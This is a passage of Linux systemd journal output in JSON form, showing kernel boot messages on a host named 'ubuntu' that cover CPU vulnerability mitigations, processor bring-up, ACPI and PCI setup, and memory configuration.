"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "68003", "MESSAGE" : "Speculative Store Bypass: Mitigation: Speculative Store Bypass disabled via prctl and seccomp" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9b;b=e2b08827b5804427b422c10c84f1567e;m=55880c;t=5bd16dd190773;x=4a3a4241b62f64d7", "__REALTIME_TIMESTAMP" : "1615280779888499", "__MONOTONIC_TIMESTAMP" : "5605388", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "72048", "MESSAGE" : "MDS: Mitigation: Clear CPU buffers" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9c;b=e2b08827b5804427b422c10c84f1567e;m=558816;t=5bd16dd19077d;x=ca6658fda5d13a1f", "__REALTIME_TIMESTAMP" : "1615280779888509", "__MONOTONIC_TIMESTAMP" : "5605398", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "91684", "MESSAGE" : "Freeing SMP alternatives memory: 36K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9d;b=e2b08827b5804427b422c10c84f1567e;m=558831;t=5bd16dd190798;x=b8166bd5baf8d6d1", "__REALTIME_TIMESTAMP" : "1615280779888536", "__MONOTONIC_TIMESTAMP" : "5605425", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "96553", "MESSAGE" : "TSC deadline timer enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9e;b=e2b08827b5804427b422c10c84f1567e;m=55883c;t=5bd16dd1907a3;x=5cb1c588c308ecba", "__REALTIME_TIMESTAMP" : "1615280779888547", "__MONOTONIC_TIMESTAMP" : "5605436", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "96556", "MESSAGE" : "smpboot: CPU0: Intel Core Processor (Skylake, IBRS) (family: 0x6, model: 0x5e, stepping: 0x3)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9f;b=e2b08827b5804427b422c10c84f1567e;m=55884c;t=5bd16dd1907b4;x=1ac20c1cab97e364", "__REALTIME_TIMESTAMP" : "1615280779888564", "__MONOTONIC_TIMESTAMP" : "5605452", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", 
"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "100099", "MESSAGE" : "Performance Events: unsupported p6 CPU model 94 no PMU driver, software events only." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a0;b=e2b08827b5804427b422c10c84f1567e;m=558858;t=5bd16dd1907bf;x=e9d2385de9d67c19", "__REALTIME_TIMESTAMP" : "1615280779888575", "__MONOTONIC_TIMESTAMP" : "5605464", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "104049", "MESSAGE" : "Hierarchical SRCU implementation." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a1;b=e2b08827b5804427b422c10c84f1567e;m=558863;t=5bd16dd1907ca;x=c20d97da25d55b95", "__REALTIME_TIMESTAMP" : "1615280779888586", "__MONOTONIC_TIMESTAMP" : "5605475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "107139", "MESSAGE" : "NMI watchdog: Perf event create on CPU 0 failed with -2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a2;b=e2b08827b5804427b422c10c84f1567e;m=55886e;t=5bd16dd1907d5;x=f34ce16a2801a7cf", "__REALTIME_TIMESTAMP" : "1615280779888597", "__MONOTONIC_TIMESTAMP" : "5605486", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "108004", "MESSAGE" : "NMI watchdog: Perf NMI watchdog permanently disabled" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a3;b=e2b08827b5804427b422c10c84f1567e;m=55887b;t=5bd16dd1907e2;x=9e2f8a8d707002f2", "__REALTIME_TIMESTAMP" : "1615280779888610", "__MONOTONIC_TIMESTAMP" : "5605499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "111112", "MESSAGE" : "smp: Bringing up secondary CPUs ..." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a4;b=e2b08827b5804427b422c10c84f1567e;m=558886;t=5bd16dd1907ed;x=bb76f562d5c0de88", "__REALTIME_TIMESTAMP" : "1615280779888621", "__MONOTONIC_TIMESTAMP" : "5605510", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "112005", "MESSAGE" : "smp: Brought up 1 node, 1 CPU" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a5;b=e2b08827b5804427b422c10c84f1567e;m=558891;t=5bd16dd1907f8;x=33b630f886699e2d", "__REALTIME_TIMESTAMP" : "1615280779888632", "__MONOTONIC_TIMESTAMP" : "5605521", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "114131", "MESSAGE" : "smpboot: Max logical packages: 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a6;b=e2b08827b5804427b422c10c84f1567e;m=55889b;t=5bd16dd190803;x=2a53e8a90fc43148", "__REALTIME_TIMESTAMP" : "1615280779888643", "__MONOTONIC_TIMESTAMP" : "5605531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", 
"_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "116005", "MESSAGE" : "smpboot: Total of 1 processors activated (4199.98 BogoMIPS)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a7;b=e2b08827b5804427b422c10c84f1567e;m=5588a6;t=5bd16dd19080e;x=746894420000de9d", "__REALTIME_TIMESTAMP" : "1615280779888654", "__MONOTONIC_TIMESTAMP" : "5605542", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "119435", "MESSAGE" : "devtmpfs: initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a8;b=e2b08827b5804427b422c10c84f1567e;m=5588b1;t=5bd16dd190818;x=e72a5a38f55f26df", "__REALTIME_TIMESTAMP" : "1615280779888664", "__MONOTONIC_TIMESTAMP" : "5605553", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "120068", "MESSAGE" : "x86/mm: Memory block size: 128MB" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a9;b=e2b08827b5804427b422c10c84f1567e;m=5588bb;t=5bd16dd190823;x=c0a4ca14054c8e4", "__REALTIME_TIMESTAMP" : "1615280779888675", "__MONOTONIC_TIMESTAMP" : "5605563", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "122504", "MESSAGE" : "evm: security.selinux" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=aa;b=e2b08827b5804427b422c10c84f1567e;m=5588c6;t=5bd16dd19082d;x=558fdecd8286a4dc", "__REALTIME_TIMESTAMP" : "1615280779888685", "__MONOTONIC_TIMESTAMP" : "5605574", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "124007", "MESSAGE" : "evm: security.SMACK64" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ab;b=e2b08827b5804427b422c10c84f1567e;m=5588d0;t=5bd16dd190838;x=2f1ea8009bd59d94", "__REALTIME_TIMESTAMP" : "1615280779888696", "__MONOTONIC_TIMESTAMP" : "5605584", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "125731", "MESSAGE" : "evm: security.SMACK64EXEC" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ac;b=e2b08827b5804427b422c10c84f1567e;m=5588db;t=5bd16dd190843;x=14f8462e86947c7b", "__REALTIME_TIMESTAMP" : "1615280779888707", "__MONOTONIC_TIMESTAMP" : "5605595", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "127648", "MESSAGE" : "evm: security.SMACK64TRANSMUTE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ad;b=e2b08827b5804427b422c10c84f1567e;m=5588e9;t=5bd16dd190850;x=83d11ee26d1c338a", "__REALTIME_TIMESTAMP" : "1615280779888720", "__MONOTONIC_TIMESTAMP" : "5605609", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "128005", "MESSAGE" : "evm: security.SMACK64MMAP" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ae;b=e2b08827b5804427b422c10c84f1567e;m=5588f3;t=5bd16dd19085b;x=ee2eb152bf5ce56e", "__REALTIME_TIMESTAMP" : "1615280779888731", "__MONOTONIC_TIMESTAMP" : "5605619", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "129921", "MESSAGE" : "evm: security.apparmor" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=af;b=e2b08827b5804427b422c10c84f1567e;m=5588fe;t=5bd16dd190865;x=ab6a0d553baa82c5", "__REALTIME_TIMESTAMP" : "1615280779888741", "__MONOTONIC_TIMESTAMP" : "5605630", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "131759", "MESSAGE" : "evm: security.ima" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b0;b=e2b08827b5804427b422c10c84f1567e;m=558908;t=5bd16dd190870;x=a9eb69f594c7fb0b", "__REALTIME_TIMESTAMP" : "1615280779888752", "__MONOTONIC_TIMESTAMP" : "5605640", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "132004", "MESSAGE" : "evm: security.capability" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b1;b=e2b08827b5804427b422c10c84f1567e;m=558913;t=5bd16dd19087b;x=368f694212dd1cfd", "__REALTIME_TIMESTAMP" : "1615280779888763", "__MONOTONIC_TIMESTAMP" : "5605651", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : 
"6", "_SOURCE_MONOTONIC_TIMESTAMP" : "134067", "MESSAGE" : "clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b2;b=e2b08827b5804427b422c10c84f1567e;m=55891e;t=5bd16dd190885;x=a4b40ddaf08c750b", "__REALTIME_TIMESTAMP" : "1615280779888773", "__MONOTONIC_TIMESTAMP" : "5605662", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "136014", "MESSAGE" : "futex hash table entries: 256 (order: 2, 16384 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b3;b=e2b08827b5804427b422c10c84f1567e;m=55894a;t=5bd16dd1908b2;x=ac4fd07b5b9baa26", "__REALTIME_TIMESTAMP" : "1615280779888818", "__MONOTONIC_TIMESTAMP" : "5605706", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "139127", "MESSAGE" : "pinctrl core: initialized pinctrl subsystem" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b4;b=e2b08827b5804427b422c10c84f1567e;m=558958;t=5bd16dd1908bf;x=109ba1c01d9671b8", "__REALTIME_TIMESTAMP" : "1615280779888831", "__MONOTONIC_TIMESTAMP" : "5605720", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "140213", "MESSAGE" : "RTC time: 9:06:13, date: 03/09/21" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b5;b=e2b08827b5804427b422c10c84f1567e;m=558971;t=5bd16dd1908d8;x=80838b6178b3c0c8", "__REALTIME_TIMESTAMP" : "1615280779888856", 
"__MONOTONIC_TIMESTAMP" : "5605745", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "142476", "MESSAGE" : "NET: Registered protocol family 16" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b6;b=e2b08827b5804427b422c10c84f1567e;m=55897b;t=5bd16dd1908e2;x=cf1b6348726ee031", "__REALTIME_TIMESTAMP" : "1615280779888866", "__MONOTONIC_TIMESTAMP" : "5605755", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "144130", "MESSAGE" : "audit: initializing netlink subsys (disabled)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b7;b=e2b08827b5804427b422c10c84f1567e;m=558987;t=5bd16dd1908ee;x=d881522247a210fc", "__REALTIME_TIMESTAMP" : "1615280779888878", "__MONOTONIC_TIMESTAMP" : "5605767", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "146824", "MESSAGE" : "cpuidle: using governor ladder" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b8;b=e2b08827b5804427b422c10c84f1567e;m=5589a5;t=5bd16dd19090c;x=f98760cb0fc5f2a9", "__REALTIME_TIMESTAMP" : "1615280779888908", "__MONOTONIC_TIMESTAMP" : "5605797", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "148005", "MESSAGE" : "cpuidle: using governor menu" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b9;b=e2b08827b5804427b422c10c84f1567e;m=5589c7;t=5bd16dd19092e;x=17c77ea6d366b3e3", "__REALTIME_TIMESTAMP" : "1615280779888942", "__MONOTONIC_TIMESTAMP" : "5605831", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "150022", "MESSAGE" : "ACPI: bus type PCI registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ba;b=e2b08827b5804427b422c10c84f1567e;m=5589d4;t=5bd16dd19093c;x=5b7e72e98e290b11", "__REALTIME_TIMESTAMP" : "1615280779888956", "__MONOTONIC_TIMESTAMP" : "5605844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "152006", "MESSAGE" : "acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bb;b=e2b08827b5804427b422c10c84f1567e;m=5589de;t=5bd16dd190945;x=a88f6cfbae8d7670", "__REALTIME_TIMESTAMP" : "1615280779888965", "__MONOTONIC_TIMESTAMP" : "5605854", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "155216", "MESSAGE" : "audit: type=2000 audit(1615280773.856:1): state=initialized audit_enabled=0 res=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bc;b=e2b08827b5804427b422c10c84f1567e;m=5589e7;t=5bd16dd19094f;x=b67c753439edef0f", "__REALTIME_TIMESTAMP" : "1615280779888975", "__MONOTONIC_TIMESTAMP" : "5605863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" 
: "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "156179", "MESSAGE" : "PCI: Using configuration type 1 for base access" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bd;b=e2b08827b5804427b422c10c84f1567e;m=5589f1;t=5bd16dd190958;x=536aeb8a25d630e8", "__REALTIME_TIMESTAMP" : "1615280779888984", "__MONOTONIC_TIMESTAMP" : "5605873", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "160064", "MESSAGE" : "HugeTLB registered 1.00 GiB page size, pre-allocated 0 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=be;b=e2b08827b5804427b422c10c84f1567e;m=5589fa;t=5bd16dd190962;x=7584dce8696d31f5", "__REALTIME_TIMESTAMP" : "1615280779888994", "__MONOTONIC_TIMESTAMP" : "5605882", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "163176", "MESSAGE" : "HugeTLB registered 2.00 MiB page size, pre-allocated 0 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bf;b=e2b08827b5804427b422c10c84f1567e;m=558a04;t=5bd16dd19096b;x=5dfc2fc3abb5b9fb", "__REALTIME_TIMESTAMP" : "1615280779889003", "__MONOTONIC_TIMESTAMP" : "5605892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "164236", "MESSAGE" : "ACPI: Added _OSI(Module Device)" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c0;b=e2b08827b5804427b422c10c84f1567e;m=558a10;t=5bd16dd190977;x=7d5acb62d40d66d1", "__REALTIME_TIMESTAMP" : "1615280779889015", "__MONOTONIC_TIMESTAMP" : "5605904", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "166441", "MESSAGE" : "ACPI: Added _OSI(Processor Device)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c1;b=e2b08827b5804427b422c10c84f1567e;m=558a1a;t=5bd16dd190981;x=6ad2bb73c5d4cdf9", "__REALTIME_TIMESTAMP" : "1615280779889025", "__MONOTONIC_TIMESTAMP" : "5605914", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "168010", "MESSAGE" : "ACPI: Added _OSI(3.0 _SCP Extensions)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c2;b=e2b08827b5804427b422c10c84f1567e;m=558a23;t=5bd16dd19098b;x=eae3ea2658bb846e", "__REALTIME_TIMESTAMP" : "1615280779889035", "__MONOTONIC_TIMESTAMP" : "5605923", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "170468", "MESSAGE" : "ACPI: Added _OSI(Processor Aggregator Device)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c3;b=e2b08827b5804427b422c10c84f1567e;m=558a2c;t=5bd16dd190994;x=41913f21bd12619", "__REALTIME_TIMESTAMP" : "1615280779889044", "__MONOTONIC_TIMESTAMP" : "5605932", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", 